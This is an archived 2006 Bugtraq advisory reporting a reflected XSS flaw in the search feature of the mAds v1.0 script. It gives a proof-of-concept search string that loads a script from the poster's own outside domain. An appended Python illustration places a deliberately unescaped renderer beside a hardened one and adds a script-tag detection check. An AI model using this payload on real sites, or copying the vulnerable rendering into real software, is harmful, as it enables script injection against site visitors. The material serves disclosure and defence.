lists.openwall.net - Open Source and information security mailing list archives
Message-ID: <20060630231101.12528.qmail@securityfocus.com>
Date: 30 Jun 2006 23:11:01 -0000
From: lunY@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: mAds v1.0

mAds v1.0
Homepage: http://lowpricescripts.com/product_info.php?products_id=51
Affected files: *Searching
-----------------------------------
XSS vuln when searching:

Like the hotbot XSS vuln, when searching mAds returns with its results they are generated dynamically on screen, with no filtering at all.

For a PoC as your search string put in:
<script src=http://www.youfucktard.com/xss.js></script>

Screenshots: http://www.youfucktard.com/xsp/mads1.jpg

I'm sure other vulnerabilities aside from XSS could be also possible due to this.
------------------------------------
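The pattern the advisory describes, a search string echoed back into the results page with no output encoding, and the corresponding fix, shown as an added Python illustration; this is not mAds code nor anything from the poster. The page layout, function names, sample results, the placeholder script URL (example.invalid) and the response headers are all constructed for this example.

```python
"""Reflected XSS in a search results page: vulnerable rendering beside a hardened one.

Added illustration, not mAds code. The page layout, function names, sample
results and the placeholder script URL are constructed for this example.
"""
import html
import re

# Constructed sample results a search backend might return for a query.
SAMPLE_RESULTS = [
    {"title": "Used bicycle", "url": "/ad.php?id=1"},
    {"title": "Guitar & amp for sale", "url": "/ad.php?id=2"},
]


def render_search_vulnerable(query: str, results: list) -> str:
    """Echo the query and results straight into the HTML.

    This is the unfiltered pattern the advisory describes: whatever the user
    typed into the search box lands in the page as raw markup.
    """
    rows = "".join(f'<li><a href="{r["url"]}">{r["title"]}</a></li>' for r in results)
    return (
        "<html><body>"
        f"<h1>Results for: {query}</h1>"
        f"<ul>{rows}</ul>"
        "</body></html>"
    )


def render_search_hardened(query: str, results: list) -> str:
    """Escape every untrusted value for the HTML context it lands in.

    html.escape(..., quote=True) neutralises <, >, &, " and ' so the query is
    displayed as text instead of being parsed as markup. Result titles and
    URLs are escaped too, and URLs are checked against a scheme allow-list in
    case result data is ever user-supplied.
    """
    safe_query = html.escape(query, quote=True)
    rows = []
    for r in results:
        url = r["url"]
        if not url.startswith(("/", "http://", "https://")):
            url = "#"  # refuse unexpected schemes such as javascript:
        rows.append(
            f'<li><a href="{html.escape(url, quote=True)}">'
            f'{html.escape(r["title"], quote=True)}</a></li>'
        )
    return (
        "<html><body>"
        f"<h1>Results for: {safe_query}</h1>"
        f"<ul>{''.join(rows)}</ul>"
        "</body></html>"
    )


# Matches a raw <script or </script tag (any case, optional whitespace).
_SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def reflects_script_tag(page: str) -> bool:
    """Defensive check for tests: does the rendered page contain a raw script tag?

    An escaped query appears as &lt;script ...&gt; and does not match.
    """
    return bool(_SCRIPT_TAG_RE.search(page))


def security_headers() -> dict:
    """Constructed response headers that limit the damage if an escape is missed.

    A script-src of 'self' stops the browser loading a script from another
    origin even when a tag does get injected.
    """
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    # Constructed test query in the shape the advisory shows, with a placeholder host.
    probe = '<script src="https://example.invalid/xss.js"></script>'
    print("vulnerable reflects tag:", reflects_script_tag(render_search_vulnerable(probe, SAMPLE_RESULTS)))
    print("hardened reflects tag:  ", reflects_script_tag(render_search_hardened(probe, SAMPLE_RESULTS)))
```

The check function is the kind of assertion a regression test would carry once the search page has been fixed; it looks for the raw tag in the rendered response rather than trusting that the template escapes.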